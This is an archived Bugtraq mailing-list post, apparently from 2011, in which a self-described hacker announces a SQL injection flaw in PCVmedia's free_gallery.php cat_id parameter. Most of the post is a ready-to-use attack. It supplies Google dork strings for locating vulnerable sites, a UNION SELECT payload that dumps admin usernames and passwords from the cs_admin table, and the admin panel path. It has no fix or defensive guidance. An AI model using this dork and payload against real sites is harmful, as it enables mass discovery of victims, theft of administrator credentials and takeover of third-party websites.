[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability
- From: ehsan_hp200@xxxxxxxxxxx
- Date: Fri, 12 Aug 2011 16:30:51 GMT
################################ IRANIAN THE BEST HACKERS IN THE WORLD
##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## PCVmedia (free_gallery.php?cat_id)
##
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME : www.ehsanhp.blogsky.com
##
## Email : Ehsan_Hp200@xxxxxxxxxxx
##
## Vendor : http://www.pcvmedia.com/
##
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##
Dork : "Website designed & developed by PCVmedia.com"
"inurl:free_gallery.php?cat_id="
Exploite:
www.victim.com/free_gallery.php?cat_id=-1 union select
1,2,concat(username,0x3,password),4,5,6 from cs_admin
#########################################################################################
Admin Panel : www.victim.com/admin
#########################################################################################
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
##########################################################################################
############################### IRANIAN THE BEST HACKERS IN THE WORLD
##################